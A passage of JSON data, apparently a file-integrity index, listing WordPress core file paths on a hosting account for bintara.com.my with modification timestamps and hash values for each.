es_mcrypt.php\":{\"d\":1512088662,\"h\":\"8721bb3eb0be8a239cfec679371ca6dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/random_compat\\/random.php\":{\"d\":1457448328,\"h\":\"878595e91ef1477c8c315b085f73319a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-header-image-control.php\":{\"d\":1508373290,\"h\":\"dbb76b23c0aefc58e9ac06224e9a2528\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-nav-menu-item-setting.php\":{\"d\":1508293670,\"h\":\"405657b600f6f8b9c2cd436aa0586ae7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-nav-menu-auto-add-control.php\":{\"d\":1507161170,\"h\":\"4eb22b0643232b7cf3665aa69d995de5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-new-menu-control.php\":{\"d\":1541987628,\"h\":\"46f4cbde74e170d0401a71cfc097c197\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-partial.php\":{\"d\":1504956222,\"h\":\"eee895fb6cfb741733581d66850574e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-nav-menu-locations-control.php\":{\"d\":1507741730,\"h\":\"41985d56d92a75d38eab0b0cb85ccc2f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-cropped-image-control.php\":{\"d\":1501107104,\"h\":\"47e1705be410717d79fd0504aa310f87\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-nav-menu-name-control.php\":{\"d\":1507161170,\"h\":\"dade37ec66f557b7d59a371201c1b486\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-themes-panel.php\":{\"d\":1507347054,\"h\":\"7f537619b685fce5c2ac4644f094d611\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-background-position-control.php\":{\"d\":1501107104,\"h\":\"c46102b8c28fad2f7236cdc635536f7f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-nav-menu-section.php\":{\"d\":1501107104,\"h\":\"c571084374460964a0630c789aae4613\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-image-control.php\":{\"d\":1505933686,\"h\":\"e531cecbbb40f0e08ac2bf5d08e9447a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-custom-css-setting.php\":{\"d\":1505273928,\"h\":\"756086c833e414618d2187182066286d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-nav-menu-setting.php\":{\"d\":1501107104,\"h\":\"8eca641d3e98443f12e88dccece79e70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-filter-setting.php\":{\"d\":1501107104,\"h\":\"12184dddda606616afec00eca96975fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-themes-section.php\":{\"d\":1516035640,\"h\":\"c4e95b71f5fe5edf819ce9b09ccb5ce2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-widget-form-customize-control.php\":{\"d\":1501107104,\"h\":\"ae10fa13b7203e976c64ff14b8e87067\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-color-control.php\":{\"d\":1504445566,\"h\":\"73d858a26f49960cb4eba760bc384e08\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-site-icon-control.php\":{\"d\":1501107104,\"h\":\"d8918dfb7adff2adf6fd97c8bb0f7199\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-upload-control.php\":{\"d\":1445704046,\"h\":\"4aeba7d8c346f71e79c5bea97240937b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-widget-area-customize-control.php\":{\"d\":1501107104,\"h\":\"931675e7cdb90f973773fb7199acb2b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-nav-menu-location-control.php\":{\"d\":1508329308,\"h\":\"66ade1bfa0332f7ee070d29843d839bb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-nav-menus-panel.php\":{\"d\":1507161170,\"h\":\"ed5669548f3fe593f197f235880e3897\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-nav-menu-item-control.php\":{\"d\":1501107104,\"h\":\"957346b461eb1f744bd76aa5cc44a2ca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-theme-control.php\":{\"d\":1525386926,\"h\":\"912138f532b191aeb06f2d77af7e4e1a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-sidebar-section.php\":{\"d\":1501107104,\"h\":\"12c5054e37c488e4a3f09dc80ef83ff9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-date-time-control.php\":{\"d\":1509991128,\"h\":\"5c3e92678c6cc72a342b8909464bab8a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-selective-refresh.php\":{\"d\":1501107104,\"h\":\"1cf9296cbdcc4346270ab717912c6697\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-background-image-control.php\":{\"d\":1477455750,\"h\":\"700fcf87fa150f061f909dd1747cce33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-header-image-setting.php\":{\"d\":1480629342,\"h\":\"33a7a6cf0c70fcac180247c9739230a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-media-control.php\":{\"d\":1509126528,\"h\":\"1860299cb2fcb56823b70966536198c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-code-editor-control.php\":{\"d\":1508508588,\"h\":\"9d90cd972b5f9af3c39646581228b5eb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-nav-menu-control.php\":{\"d\":1516700140,\"h\":\"bf973f33aec3eed52e169af4663ed808\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-new-menu-section.php\":{\"d\":1541987628,\"h\":\"3f3ddcca00cc82ecfe56fa66593fe8e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/customize\\/class-wp-customize-background-image-setting.php\":{\"d\":1445701886,\"h\":\"29d940877494fe6a123233b413e39d57\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/images\\/crystal\\/license.txt\":{\"d\":1393805068,\"h\":\"f05db54c63e36918479b6651930dcfe7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/plugin.php\":{\"d\":1507139750,\"h\":\"3670b2158c3b82c250d15ed952261b65\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-widget.php\":{\"d\":1506973486,\"h\":\"d8592b30a4f80781bce9046616720829\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-network-query.php\":{\"d\":1540576118,\"h\":\"9fc4f158e833f6e0b8b6d7d17d02e5a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/feed.php\":{\"d\":1511962898,\"h\":\"0745bf40fc80d30511bf83c7c55a7ee8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/date.php\":{\"d\":1501107104,\"h\":\"698a2e5cccfb60f95659db9e8ef5f0a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ms-default-constants.php\":{\"d\":1506899688,\"h\":\"55fad8b8f4cd83131c4841ac4e9ea48d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/wp-db.php\":{\"d\":1542850184,\"h\":\"509f50f8a4463076dd479ad338cd266e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/link-template.php\":{\"d\":1531905746,\"h\":\"b1d56ba377350468aefd042bff7de289\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-walker-comment.php\":{\"d\":1506973486,\"h\":\"20c2bcb24bd33b5cc11da9e9d579f0c1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-snoopy.php\":{\"d\":1467799830,\"h\":\"73b05cdec5859ff6edcfbcd22ebd0960\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/author-template.php\":{\"d\":1540530506,\"h\":\"130df61fd47b620c010418deaa140adf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-role.php\":{\"d\":1501107104,\"h\":\"2bf1747124efad32400b254e0544bb11\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-rewrite.php\":{\"d\":1506973486,\"h\":\"a1f93fbcfce5b8be8d14f28d94dc703f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/category-template.php\":{\"d\":1540530506,\"h\":\"c0e1099205a0d9724aed67709def6309\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/wlwmanifest.xml\":{\"d\":1386782352,\"h\":\"dfd490b6f383ea02a269031ff05e8896\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-admin-bar.php\":{\"d\":1501107104,\"h\":\"a6a67e81b768cfde9feec87b3aac5689\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/option.php\":{\"d\":1508877048,\"h\":\"fadc3f42e05cc23074cdc36be2df7643\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-walker-page.php\":{\"d\":1506973486,\"h\":\"2feb8781abe406731f03817c8defd8a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/shortcodes.php\":{\"d\":1503252522,\"h\":\"06d4045fc2563111fdf0c9ff17e3e94e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-simplepie.php\":{\"d\":1465174470,\"h\":\"0dbef394a91127f068ac8fdd587d4895\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/feed-rss.php\":{\"d\":1477419510,\"h\":\"4dc733d73fd9ebc810a067c12e0e420d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/kses.php\":{\"d\":1544673263,\"h\":\"21759b786ec4f495f8a58c7320ccdb10\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-text-diff-renderer-table.php\":{\"d\":1540015600,\"h\":\"fb5d8b3954327fcfe054a61fb621f122\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/cache.php\":{\"d\":1506973486,\"h\":\"f70029cf783aa6828b1132a1a1605d6a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets.php\":{\"d\":1540530506,\"h\":\"099129a06b80d8f629c66c9e8cff0080\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ms-functions.php\":{\"d\":1516706260,\"h\":\"347598ec1d6512d32f1916404c32653a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-dependency.php\":{\"d\":1541071308,\"h\":\"4974fd7e8dc362a5ddc2ee3d8c8e59db\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/pluggable.php\":{\"d\":1540530506,\"h\":\"2c8f76488586f0a9822921638622078e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-image-editor-imagick.php\":{\"d\":1503391364,\"h\":\"6f88af28a8913e543d88d64488a7bf45\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/cron.php\":{\"d\":1498789482,\"h\":\"61e1f842e15b437df71484f51c83fd55\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ms-deprecated.php\":{\"d\":1544673263,\"h\":\"9369872c737adef6a019f5dc972ccff4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-walker.php\":{\"d\":1506973486,\"h\":\"d1250b485bfa907c4ed10b8e9aaf00f6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/version.php\":{\"d\":1547081533,\"h\":\"28603c0ed70fa15ac2c13e62b4de6b9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-phpass.php\":{\"d\":1444166126,\"h\":\"03191a210ccbea54cb07dedfedb7cc42\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-metadata-lazyloader.php\":{\"d\":1501107104,\"h\":\"7e2505199b2eb779583ad9f4ae566502\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-roles.php\":{\"d\":1506539684,\"h\":\"7f5970eb72e65adf62a20f0ae4027031\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/capabilities.php\":{\"d\":1540268618,\"h\":\"59ecbe819f7b48498c994d51d9571f43\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-http-ixr-client.php\":{\"d\":1463931928,\"h\":\"c1d5c63f0c6f615ad83b6cfe96bd11ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-smtp.php\":{\"d\":1484088822,\"h\":\"12c62b22075a3c4b74ebc8ab3a98d295\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/locale.php\":{\"d\":1480729598,\"h\":\"5fac3f3e6e59e2ba781546e0e287f1ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/default-widgets.php\":{\"d\":1506311926,\"h\":\"1aa4e034046b70de77e83f2a80c31cc6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/embed-template.php\":{\"d\":1467799830,\"h\":\"880c0f3ebdef45564a7b3b1536ff212a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp.php\":{\"d\":1544673263,\"h\":\"bf4a0953bea93b3e835f27becbb3117c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-locale.php\":{\"d\":1501107104,\"h\":\"5a68f1d5624265055c796ad6bb3feabf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/atomlib.php\":{\"d\":1481584780,\"h\":\"624a338dd694e5ae656b039565d6275b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/comment-template.php\":{\"d\":1540530506,\"h\":\"6e0ba0064e245f2f977dae690903f707\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ms-load.php\":{\"d\":1507049810,\"h\":\"e0a89b3f42e20b1705c7f74c76ef75e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-requests.php\":{\"d\":1475628878,\"h\":\"3965aca1181b2fb6ec75617ab4d4223c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-matchesmapregex.php\":{\"d\":1501107104,\"h\":\"255bbff32eb95e0b1407e3a1874d9079\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-list-util.php\":{\"d\":1501107104,\"h\":\"bb4736b9c88a291e2c8c6b984b03fc46\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-customize-control.php\":{\"d\":1509160728,\"h\":\"e4cfacdd71317334185d2779da1ccde9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/registration-functions.php\":{\"d\":1467799830,\"h\":\"1c4b69ca4cd9b8538714b2483d0e5995\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-http-proxy.php\":{\"d\":1463931928,\"h\":\"c03d899abae74d1a7ba338297605bb1c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-http-encoding.php\":{\"d\":1465525234,\"h\":\"6bd6106b97e662ea37e568da5e233cc0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ms-settings.php\":{\"d\":1508164608,\"h\":\"7037d87a51c10b9b474b580efea1d4a3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/admin-bar.php\":{\"d\":1540530506,\"h\":\"78228045fc8d83d06ae6c3bc52d3073b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/revision.php\":{\"d\":1478723432,\"h\":\"a64aac575856cde32fef754fba8df20e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-network.php\":{\"d\":1509384408,\"h\":\"b68743cc298d35f2edf6b06bb4b545ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-site-query.php\":{\"d\":1540576118,\"h\":\"63536f555ee05ab8f28562219bc310e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/default-filters.php\":{\"d\":1542837288,\"h\":\"09d2c74bd3de3bcd873344209479daa3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-json.php\":{\"d\":1449428006,\"h\":\"808a427ba07643d4deaf4dfdcf418e6d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/error_log\":{\"d\":1546362651,\"h\":\"1a1155349f98e582287bc47f87ebb5d0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/query.php\":{\"d\":1540530506,\"h\":\"97f25d185e583d0a4821de7fd6e47004\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/vars.php\":{\"d\":1497519342,\"h\":\"f78cf4adaa3f0a10e41279e96f3794f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/template-loader.php\":{\"d\":1475865212,\"h\":\"a745024f45f018741479bdcf5518f59b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/functions.php\":{\"d\":1547081519,\"h\":\"10bd4b1d23b8a574eaf862c1eab5c3d9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/deprecated.php\":{\"d\":1540530506,\"h\":\"302ca1a137f8734befc36e681f3fbc8e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/general-template.php\":{\"d\":1544673263,\"h\":\"2ffd9e47413b7ccae2f838d554b9bfd7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/registration.php\":{\"d\":1467799830,\"h\":\"d4f39e983366ea5c1b3fd4644b19ae06\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-feed-cache.php\":{\"d\":1501107104,\"h\":\"3ad14084ac4bdffe838e4cf6f7dff8af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/formatting.php\":{\"d\":1542837288,\"h\":\"9937f792666d584ffe1a0a2c4da65292\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-walker-page-dropdown.php\":{\"d\":1501107104,\"h\":\"642f0a4f7c8436ae9f68c4006b793e64\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/feed-atom-comments.php\":{\"d\":1481861382,\"h\":\"6f31ff43e2181627e7a80145ceee279a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-xmlrpc-server.php\":{\"d\":1540389832,\"h\":\"a2bb538af8d4747acad6e932c19144e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-customize-panel.php\":{\"d\":1506259846,\"h\":\"68d82acbd85192c0c93b40f2fc4fa85d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-block-type-registry.php\":{\"d\":1539817286,\"h\":\"8920e4f6a535c62e053f5434d8cd6cb8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-oembed.php\":{\"d\":1540307920,\"h\":\"4cfd45d949997153200b6606fbc47751\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/bookmark.php\":{\"d\":1481680122,\"h\":\"af7f91328182a0f0dfb58aa349adba3b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/post-thumbnail-template.php\":{\"d\":1540530506,\"h\":\"d9251f7d387f7c8f53f0eadf11c90f46\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/comment.php\":{\"d\":1540389832,\"h\":\"d99a78d2689d8a836432d3a7452464c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/compat.php\":{\"d\":1525966166,\"h\":\"5642b1ed9adac782921c052e05595a70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ms-default-filters.php\":{\"d\":1506904784,\"h\":\"7166b7e216737e2082325570061b187e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/post-template.php\":{\"d\":1540530506,\"h\":\"43240dfe13efa3e8c72325f7b6c65fb2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/post.php\":{\"d\":1541000804,\"h\":\"20f2b538497d0baf49ffcd0fc30f1946\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/functions.wp-scripts.php\":{\"d\":1541071308,\"h\":\"675842c031b7cc79382bd6cd48f1c00f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-http-cookie.php\":{\"d\":1501107104,\"h\":\"f9c4062a7720df433521084a72f5a571\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class.wp-scripts.php\":{\"d\":1547081519,\"h\":\"905ab60f4cdecba560c6945e5ecb3528\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-post-type.php\":{\"d\":1501107104,\"h\":\"dbdc2efd2457f8d2fe01366566ab0c9f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-walker-category.php\":{\"d\":1539223970,\"h\":\"6dc53485278cbaa648d65dcbac728a07\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-feed-cache-transient.php\":{\"d\":1501107104,\"h\":\"84a3ba1bf222b54061ed4c0e572840dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class.wp-styles.php\":{\"d\":1506972814,\"h\":\"ac1b427a904bbf1b500d3e0de5f2dcc8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-site.php\":{\"d\":1508183988,\"h\":\"c4e55be944f6bca3d2c58ebb4e19bc9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-simplepie-file.php\":{\"d\":1501107104,\"h\":\"78d130d682823e6f0c8aecf5aa323fe2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-http.php\":{\"d\":1508335728,\"h\":\"7e85690772e7ba5913ddf45a6cd404be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-session-tokens.php\":{\"d\":1501107104,\"h\":\"e106ddd93b21ebb5666e37def369564b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/user.php\":{\"d\":1540530506,\"h\":\"135b104a828be2d90f3617688761278d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-customize-widgets.php\":{\"d\":1547081519,\"h\":\"55d48dafd3ed4970fc4fe91893c4eeba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/script-loader.php\":{\"d\":1547081519,\"h\":\"520380d7517b8677fabb68c24f67d2ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/session.php\":{\"d\":1480728102,\"h\":\"d94561cea0c5c13a609b9cde5a7635d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/feed-rdf.php\":{\"d\":1477419510,\"h\":\"7c15976464fe989a6136beaedd27de9a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/template.php\":{\"d\":1498743342,\"h\":\"0523871c22646012db8ff498c4bf3194\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/canonical.php\":{\"d\":1508845728,\"h\":\"1574303ede803ea9c99da43554ff9b53\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-pop3.php\":{\"d\":1477886312,\"h\":\"154b5451c8a93a4f21a74054be961d79\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api.php\":{\"d\":1540765180,\"h\":\"ed0c6e027999dd95d58084ca0bb2b512\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/pluggable-deprecated.php\":{\"d\":1467799830,\"h\":\"e463b18764f9a900ccfe7eb7356a12c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/nav-menu.php\":{\"d\":1542315048,\"h\":\"f906c272155ef475fc0dabf38444df5e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-walker-category-dropdown.php\":{\"d\":1506973486,\"h\":\"85fbd07026b485679d7d552520bc280d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-error.php\":{\"d\":1501107104,\"h\":\"7f85d13e9ec174c25c8a9215b0e1467c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-block-parser.php\":{\"d\":1547081519,\"h\":\"9d496084cdae11ed52e84f10f21ebbe1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-user-meta-session-tokens.php\":{\"d\":1501107104,\"h\":\"add59e473d63ac2edfc3175a147d3aa8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-customize-nav-menus.php\":{\"d\":1531829424,\"h\":\"68935ce93024d1a0bd2c12ee01da9b80\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-user-query.php\":{\"d\":1501107104,\"h\":\"54106aede33366dc98524079f015df35\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-tax-query.php\":{\"d\":1506973486,\"h\":\"d9f7d0672d3e0aa29ed1d6ea68068129\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-http-curl.php\":{\"d\":1508330092,\"h\":\"f9aa055cb00e668c796a64c36bc4c8b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-locale-switcher.php\":{\"d\":1540125220,\"h\":\"fd81fcff4a3f5a1ecd998680bb537b59\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/update.php\":{\"d\":1517912262,\"h\":\"e8bcac04d30305f03cba7aaec47fdf24\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/category.php\":{\"d\":1485681642,\"h\":\"9362f7ac7218e1ba2bc3a89710f37819\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-theme.php\":{\"d\":1540304500,\"h\":\"9302ab230c4815c0870aa2fc526acfdb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/feed-rss2-comments.php\":{\"d\":1481861382,\"h\":\"58d4e6d98d4